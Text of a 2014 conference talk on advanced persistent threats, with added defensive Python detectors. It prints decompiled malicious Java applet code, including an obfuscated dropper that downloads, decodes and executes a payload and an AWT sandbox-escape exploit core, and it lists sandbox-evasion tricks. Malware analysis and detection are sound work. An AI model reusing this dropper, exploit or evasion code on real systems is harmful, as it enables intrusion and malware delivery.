Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS
Andrea Pompili
There are only 10 types of people in the world: those who understand binary, and those who don't
apompili@hotmail.com
Attacker Math (Dino Dai Zovi)
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
How does an attack unfold? <#1> <#2> <#3>
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
<2000>
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
8.7 billion dollars
<2001> The Nimda Style
> Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
> Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
> Microsoft IE MIME Header Attachment Execution Vulnerability
> TFTP Server (UDP:69)
> RICHED20.DLL: Microsoft Office 2000 DLL Execution Vulnerability
635 million dollars
SQL Server 2000 Desktop Engine
75,000 computers infected in only 10 minutes
payload of only 376 bytes (resident exclusively in memory)
1.2 billion dollars
22.6 billion dollars
DDoS against www.sco.com
Upload&Execute: 0x85 0x13 0x3c 0x9e 0xa2
Backdoor TCP 3127-3198
http://echohacker.altervista.org/articoli/mydoom.html
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
Shopping For Zero-Days
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
The most complex malware in history
> 20 MB in size (900 KB main program/dropper + 16 modules identified to date)
> 80 domains used as Command and Control systems
> Spread via USB stick (Infectmedia)
> Enumeration of Bluetooth devices (Beetlejuice)
> Audio recording (Microbe)
> Windows Update MITM (Munch & Gadget)
> MD5 Collision Attack
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
Advanced Persistent Threats 101
> Trust Exploitation: Social Engineering, Spear Phishing, Botnet, Drive-to-Click Strategy
> Client Exploitation: Exploit Pack (e.g. Neutrino), 0-Day
> Multi-Stage Shellcoding: Dropper/Downloader, Modules (e.g. RAT, Infostealer, etc.), Good Covert Channel
> Multi-Vector: Email, Websites, Botnet, Physical (USB)
> Resiliency: Camouflaging, Command & Control, Good Covert Channel
Make or Buy?
The Botnet Choice
Drive-to-Click <#1> to <#5>
Trick#1> Playing with file extensions
RLO Unicode control character
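As an added illustration, not part of the slides, a Python check that a mail gateway or endpoint rule could apply to attachment names: it flags Unicode bidirectional control characters and shows how the name a user sees diverges from the extension the filesystem uses. The filenames are constructed samples; the rendering model is the simple one (text after an RLO is displayed reversed).

```python
import unicodedata
from typing import Dict, List

# Unicode bidirectional controls that can reorder how a file name is rendered.
# U+202E RIGHT-TO-LEFT OVERRIDE (RLO) is the one the slide refers to.
RLO = "\u202E"
PDF = "\u202C"  # POP DIRECTIONAL FORMATTING ends an override run
BIDI_CONTROLS = {
    "\u202A": "LRE", "\u202B": "RLE", "\u202C": "PDF", "\u202D": "LRO", "\u202E": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200E": "LRM", "\u200F": "RLM",
}


def strip_controls(name: str) -> str:
    """The name the filesystem actually sees: every Unicode format character (category Cf) removed."""
    return "".join(ch for ch in name if unicodedata.category(ch) != "Cf")


def apparent_name(name: str) -> str:
    """Approximate what a bidi-aware UI shows: the run after an RLO (up to a PDF or the end) is reversed,
    other control characters are invisible."""
    out: List[str] = []
    i = 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            if end == -1:
                end = len(name)
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS or unicodedata.category(ch) == "Cf":
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def extension(name: str) -> str:
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def inspect_filename(name: str) -> Dict[str, object]:
    real = strip_controls(name)
    shown = apparent_name(name)
    controls = [BIDI_CONTROLS.get(ch, "U+%04X" % ord(ch))
                for ch in name if unicodedata.category(ch) == "Cf"]
    return {
        "apparent": shown,
        "real_name": real,
        "apparent_extension": extension(shown),
        "real_extension": extension(real),
        "controls": controls,
        # Any format control in a file name is worth quarantining; a mismatched extension is the RLO trick itself.
        "suspicious": bool(controls),
        "extension_spoofed": bool(controls) and extension(shown) != extension(real),
    }


def scan_attachments(names: List[str]) -> List[Dict[str, object]]:
    """Return the inspection results for every name that should be blocked or quarantined."""
    return [dict(name=n, **inspect_filename(n)) for n in names if inspect_filename(n)["suspicious"]]


# Constructed samples: the second one is the classic "fdp.exe displayed as exe.pdf" RLO trick.
SAMPLE_NAMES = ["report.pdf", "invoice_" + RLO + "fdp.exe", "photo\u200E.jpg"]

if __name__ == "__main__":
    for hit in scan_attachments(SAMPLE_NAMES):
        print(hit["name"].encode("unicode_escape"), "->", hit["apparent"],
              hit["controls"], "spoofed" if hit["extension_spoofed"] else "")
```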
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers (RFC 2616)
Trick#3> Client Exploiting
<applet codebase="http://blahblah.evilsite.in/hiddenpath/"
        archive="http://blahblah.othersite.in/hiddenpath/c8c34734f41cca863a972129369060d9"
        code="rgmiv">
public class xp extends JApplet {
    public void init() {
        try {
            Object aobj[] = new Object[0];
            // every class is resolved at runtime through reflection (tcbteokd.fuss wraps Class.forName)
            Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
            // dead string reassignments: junk code inserted to defeat signatures and decompilers
            String s = "hpjwbludyi";
            s = "wgpxrwyvzolbb";
            s = "zdfmvftloqmakqysyu";
            s = "nrrkqnjfylgtljyyferr";
            cr.hzumfnc(obj);
            Object aobj1[] = new Object[0];
            String s1 = "ofvszonrzgelnko";
            s1 = "fefhtspcqhj";
            s1 = "evztavmzjarjgwu";
            Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
                Integer.TYPE
            }).newInstance(new Object[] {
                Integer.valueOf(tcbteokd.mdrikbua(9))
            });
            int ai[] = new int[8];
            Object aobj2[] = new Object[7];
            aobj2[2] = cr.hzumfnc(obj);
            ...
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
...
// decodes an obfuscated literal one character at a time
public static String n(String s) {
    String s1 = "";
    for (int i = 0; i < s.length(); i++)
        s1 += idzfihff(s.charAt(i));
    return s1;
}
...
// single-byte XOR with key 0x5b; the same call both encodes and decodes
public static char idzfihff(char c) {
    return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
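The analyst's counterpart to the obfuscation above, added here and not part of the slides: a Python routine that recovers the single-byte XOR key by known plaintext (strings handed to Class.forName start with a package prefix such as java.) and decodes the literal shown on the slide. The ranking fallback for literals without a known prefix is this example's own heuristic.

```python
import string
from typing import List, Optional, Tuple

# Literal copied from the decompiled applet on the slide (ha.n("...")); key 0x5b per the slide's idzfihff().
SLIDE_LITERAL = "1:-:u:,/u26:<>ub:6+7>0264?>7"
SLIDE_KEY = 0x5B

# What decoded Java class, package and method names are made of.
IDENTIFIER_CHARS = set(string.ascii_letters + string.digits + "._$/")


def xor_decode(s: str, key: int) -> str:
    """Java's idzfihff applied to every char: (char)(c ^ key) is its own inverse."""
    return "".join(chr(ord(c) ^ key) for c in s)


def recover_key(s: str, known_prefix: str = "java.") -> Optional[int]:
    """Known-plaintext recovery of a single-byte XOR key: the first byte alone forces the key,
    the rest of the prefix is used to confirm it."""
    if len(s) < len(known_prefix):
        return None
    key = ord(s[0]) ^ ord(known_prefix[0])
    return key if xor_decode(s[:len(known_prefix)], key) == known_prefix else None


def rank_keys(s: str, top: int = 3) -> List[Tuple[int, float]]:
    """Fallback when no prefix is known: score every key by how much of the output looks like an identifier."""
    scored = []
    for key in range(256):
        out = xor_decode(s, key)
        scored.append((key, sum(ch in IDENTIFIER_CHARS for ch in out) / len(out)))
    scored.sort(key=lambda kv: (-kv[1], kv[0]))
    return scored[:top]


def decode_all(literals: List[str], key: int) -> List[str]:
    """Bulk-decode every obfuscated literal pulled from a decompiled class."""
    return [xor_decode(lit, key) for lit in literals]


if __name__ == "__main__":
    key = recover_key(SLIDE_LITERAL)
    print("recovered key: 0x%02x" % key, "->", xor_decode(SLIDE_LITERAL, key))
    print("top candidates without a known prefix:", rank_keys(SLIDE_LITERAL))
```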
<02> Java Reflection
// every sensitive class, constructor and method is reached through reflection, so the
// class names never appear as plain literals in the applet
public static Class fuss(String s) throws Exception {
    return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) throws Exception {
    return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) throws Exception {
    return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
<03> ClassLoader Override
// a ClassLoader subclass exposes the protected defineClass(), so a class held as a byte array
// is loaded and instantiated without ever being written to disk
class t extends ClassLoader {
    public static void ujrzjw(t t1, String s) {
        try {
            Class class1 = t1.defineClass("qbw",
                tcbteokd.xcpoalaefqfvuacylvakyi, 0,
                tcbteokd.xcpoalaefqfvuacylvakyi.length);
            ygigtele.bjixqh(class1, new Class[] {
                tcbteokd.fuss("java.lang.String")
            }).newInstance(new Object[] { s });
        } catch (Exception ex) {
            System.exit(0);   // on any failure exit silently rather than leave a stack trace
        }
    }
}
Malware
The Dropper Class
...
private static void lcsqyrgtbct(String s, int i) {
    String s1 = s + Integer.valueOf(i);   // download URL built from a base plus a numeric suffix
    ...
    rchannel = Channels.newChannel((new URL(s1)).openStream());
    ...
    File file = File.createTempFile("~tmf", null);
    FileOutputStream fos = new FileOutputStream(file);
    // the downloaded payload is XOR-decoded with 0x29 before being written to the temp file
    for (int j = 0; j < abyte0.length; j++)
        abyte0[j] = (byte)(abyte0[j] ^ 0x29);
    fos.write(abyte0);
    if (abyte0.length > 1024)
        try {
            Runtime.getRuntime().exec(new String[] {
                "cmd.exe", "/C", file.getAbsolutePath()
            });
        } catch (IOException ioe) {
            // fallback when cmd.exe cannot be run: launch the dropped file directly
            (new ProcessBuilder(new String[] {
                file.getAbsolutePath()
            })).start();
        }
The Malware Core
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
// new Object[1] is a single null argument: the Statement, once run, calls System.setSecurityManager(null)
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
    obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
    new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 1, 1, 4, 0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
    new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 2, 1,
        0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte[] obj10 = new byte[] {0, -1};
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);
http://valhalla.allalla.com/2013/08/java-netbeans-applet-integer-overflow-win32-target-added/
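Added for the defender's side and not part of the slides: a small Python triage script that scans decompiled applet source for the indicators the four code slides above show together (an XOR char helper and dead string reassignments, Class.forName plus reflective construction, a ClassLoader subclass calling defineClass, a java.beans.Statement aimed at setSecurityManager, the AWT raster primitives, and a downloader that XOR-decodes into a temp file and runs it). The sample source is constructed to mirror those slides; the weights, stages and verdict thresholds are this example's own assumptions.

```python
import re
from typing import Dict, List

# Each indicator: (regex over decompiled Java, weight, stage).  Stages follow the slides' order:
# obfuscation -> loading -> sandbox escape -> dropper.
INDICATORS = {
    "xor_char_helper":       (r"\(char\)\s*\(\s*\w+\s*\^\s*0x[0-9a-fA-F]+\s*\)", 2, "obfuscation"),
    "dead_string_reassign":  (r"String\s+(\w+)\s*=\s*\"[^\"]*\";\s*\n\s*\1\s*=\s*\"", 1, "obfuscation"),
    "dynamic_class_load":    (r"Class\.forName\s*\(", 1, "loading"),
    "reflective_construct":  (r"\.getConstructor\s*\(|\.newInstance\s*\(|\.invoke\s*\(", 1, "loading"),
    "custom_classloader":    (r"extends\s+ClassLoader|\.defineClass\s*\(", 3, "loading"),
    "securitymanager_off":   (r"java\.beans\.Statement\s*\(.*setSecurityManager|setSecurityManager\s*\(\s*null", 4, "escape"),
    "awt_raster_primitives": (r"MultiPixelPackedSampleModel|createWritableRaster|IndexColorModel|createContext", 2, "escape"),
    "payload_download":      (r"openStream\s*\(|Channels\.newChannel\s*\(", 2, "dropper"),
    "xor_byte_loop":         (r"\[\s*\w+\s*\]\s*=\s*\(byte\)\s*\(.*\^\s*0x[0-9a-fA-F]+\)", 2, "dropper"),
    "temp_file_drop":        (r"createTempFile\s*\(", 1, "dropper"),
    "process_spawn":         (r"Runtime\.getRuntime\(\)\.exec\s*\(|new\s+ProcessBuilder\s*\(", 3, "dropper"),
}


def triage(source: str) -> Dict[str, object]:
    """Score one decompiled source file and report which indicators and stages were seen."""
    hits: List[str] = []
    score = 0
    stages = set()
    for name, (pattern, weight, stage) in INDICATORS.items():
        if re.search(pattern, source):
            hits.append(name)
            score += weight
            stages.add(stage)
    # An escape-stage hit together with a dropper-stage hit is the applet chain the slides describe;
    # otherwise fall back on the weighted score.
    if "escape" in stages and "dropper" in stages:
        verdict = "malicious-applet-chain"
    elif score >= 6:
        verdict = "suspicious"
    else:
        verdict = "benign-or-unknown"
    return {"hits": hits, "score": score, "stages": sorted(stages), "verdict": verdict}


# Constructed sample echoing the obfuscated applet on the slides (fragments only, not a working program).
SAMPLE_SOURCE = '''
public static char idzfihff(char c) { return (char)(c ^ 0x5b); }
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
public static Class fuss(String s) throws Exception { return Class.forName(s); }
class t extends ClassLoader {
  Class class1 = t1.defineClass("qbw", buf, 0, buf.length);
  ygigtele.bjixqh(class1, new Class[] { String.class }).newInstance(new Object[] { s });
}
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
rchannel = Channels.newChannel((new URL(s1)).openStream());
File file = File.createTempFile("~tmf", null);
abyte0[j] = (byte)(abyte0[j] ^ 0x29);
Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() });
'''

# Constructed benign applet for comparison.
BENIGN_SOURCE = '''
public class Hello extends JApplet {
  public void init() { getContentPane().add(new JLabel("hello")); }
}
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SOURCE), ("benign", BENIGN_SOURCE)):
        print(label, triage(src))
```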
The Cheaper Path to Exploiting
Blackhole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
RedKit
http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
The InfoStealer Choice
The RAT Choice
Bitcoin + APT = Ransomware
The Command&Control Choice <#1> to <#4>
<2012> The Antivirus Maker Confession
“The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
Mikko Hypponen (F-Secure)
The Way to Sandboxing
<01> USER-MODE AGENT
Software component in a guest operating system (keylogger)
<02> KERNEL-MODE PATCHING
Guest operating system kernel modified for tracing (rootkit)
<03> VIRTUAL MACHINE MONITORING
Customized hypervisor to monitor the guest operating system
<04> SYSTEM EMULATION
Hardware emulator to hook the appropriate memory, I/O functions, peripherals, etc.
<05> KERNEL EMULATION
Kernel emulator to hook the appropriate system calls, etc.
A (very) partial list of the players
> Norman Sandbox (Norway 2001)
> FireEye (US 2004)
> Damballa (US 2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay, formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
A (completely) partial list of the evaders
Evading Sandbox 4 Dummies
> Human Interaction (UpClicker, December 2012)
> MessageBox (something that needs to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013: a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and size
> Check self executable name
> Execution after reboot
> Check system services, files and communication ports
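As an added example, not from the slides, a Python pass over a constructed API trace of the kind a sandbox records, flagging the evasion behaviours in the list above: stalling with long sleeps, gating on mouse movement or a dialog, date triggers, connectivity and volume checks, self-name checks and run-after-reboot persistence. The trace format, the API names chosen as "payload activity" and the thresholds are this example's assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed trace in the "API(args)[=result]" line format this example assumes a sandbox emits.
TRACE = r"""
GetModuleFileNameW()="C:\sample\a.exe"
lstrcmpiW("a.exe","update.exe")
GetVolumeInformationW("C:\")
GetDiskFreeSpaceExW("C:\")=42949672960
InternetGetConnectedState()
GetLocalTime()=2013-03-20
GetCursorPos()
GetCursorPos()
GetCursorPos()
Sleep(300000)
Sleep(300000)
MessageBoxW("Please click OK to continue")
RegSetValueExW("HKCU\Software\Microsoft\Windows\CurrentVersion\Run","svc")
ExitProcess(0)
"""

# Calls that mean the sample actually did something; if none occur, the checks gated the payload.
PAYLOAD_APIS = {"CreateFileW", "WriteFile", "InternetOpenUrlW", "connect", "send", "CreateProcessW"}
SLEEP_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}
TIME_APIS = {"GetLocalTime", "GetSystemTime", "GetSystemTimeAsFileTime"}
STALL_THRESHOLD_MS = 5 * 60 * 1000   # assumption: longer than the analysis run is willing to wait


def parse_trace(text: str) -> List[Tuple[str, str]]:
    """Return (api, argument-string) pairs; lines that do not look like a call are skipped."""
    calls = []
    for line in text.strip().splitlines():
        m = re.match(r"(\w+)\((.*?)\)", line)
        if m:
            calls.append((m.group(1), m.group(2)))
    return calls


def evasion_indicators(calls: List[Tuple[str, str]]) -> Dict[str, str]:
    apis = [api for api, _ in calls]
    payload_seen = PAYLOAD_APIS.intersection(apis)
    found: Dict[str, str] = {}

    # Sleep Calls (Trojan Nap): sum the requested delays.
    sleep_ms = 0
    for api, args in calls:
        first = args.split(",")[0].strip()
        if api in SLEEP_APIS and first.isdigit():
            sleep_ms += int(first)
    if sleep_ms >= STALL_THRESHOLD_MS:
        found["sleep_stalling"] = "%d ms of sleep requested" % sleep_ms

    # Human Interaction (UpClicker) and MessageBox: waits on the mouse or a dialog before doing anything.
    if apis.count("GetCursorPos") >= 3:
        found["mouse_polling"] = "GetCursorPos polled %d times" % apis.count("GetCursorPos")
    box = next((i for i, a in enumerate(apis) if a.startswith("MessageBox")), None)
    if box is not None and not PAYLOAD_APIS.intersection(apis[:box]):
        found["messagebox_gate"] = "dialog shown before any payload activity"

    # Time Triggers (Hastati): reads the clock, then exits cleanly without ever touching a payload API.
    if TIME_APIS.intersection(apis) and "ExitProcess" in apis and not payload_seen:
        found["time_trigger"] = "date read, then clean exit with no payload activity"

    # Environment checks from the list: connectivity, volume/disk size, own executable name.
    if {"InternetGetConnectedState", "InternetCheckConnectionW"}.intersection(apis):
        found["connectivity_check"] = "probes for a live Internet connection"
    if {"GetVolumeInformationW", "GetDiskFreeSpaceExW"}.intersection(apis):
        found["volume_check"] = "queries volume information or disk size"
    if "GetModuleFileNameW" in apis and any(a.startswith("lstrcmp") for a in apis):
        found["self_name_check"] = "compares its own executable name with an expected one"

    # Execution after reboot: a Run key or a service means the real behaviour only starts next boot.
    if any(api.startswith("RegSetValueEx") and r"CurrentVersion\Run" in args for api, args in calls) \
            or "CreateServiceW" in apis:
        found["reboot_persistence"] = "installs a run-at-boot entry"
    return found


def analyse(text: str) -> Dict[str, str]:
    """Parse a trace and return the evasion indicators it exhibits, keyed by indicator name."""
    return evasion_indicators(parse_trace(text))


if __name__ == "__main__":
    for name, why in analyse(TRACE).items():
        print("%-20s %s" % (name, why))
```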
The limits of sandboxes
(chart; horizontal axis in minutes)
def: Patient Zero is the first patient identified in the population sample of an epidemiological investigation
Definitely better than trusting the users
Questions?
(shown on the slide in Italian "Domande?", Arabic, Spanish "¿Preguntas?", English, Klingon "tupoQghachmey", Sindarin, Japanese, Greek "Ερωτήσεις?" and Russian "вопросы?")

 

Ähnlich wie The magic world of APT 0.6 - Pompili (20)

Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea Pompili
 
Pompili - The miracle of sprite multiplication (C64)
Pompili -  The miracle of sprite multiplication (C64)Pompili -  The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the masses
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolers
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
 
Ignite java-robots
Ignite java-robotsIgnite java-robots
Ignite java-robots
 
The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014
 
SpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationSpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk Presentation
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 

Mehr von Codemotion

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Codemotion
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaCodemotion
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserCodemotion
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Codemotion
 
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019Codemotion
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Codemotion
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Codemotion
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Codemotion
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Codemotion
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Codemotion
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Codemotion
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Codemotion
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Codemotion
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Codemotion
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...Codemotion
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Codemotion
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
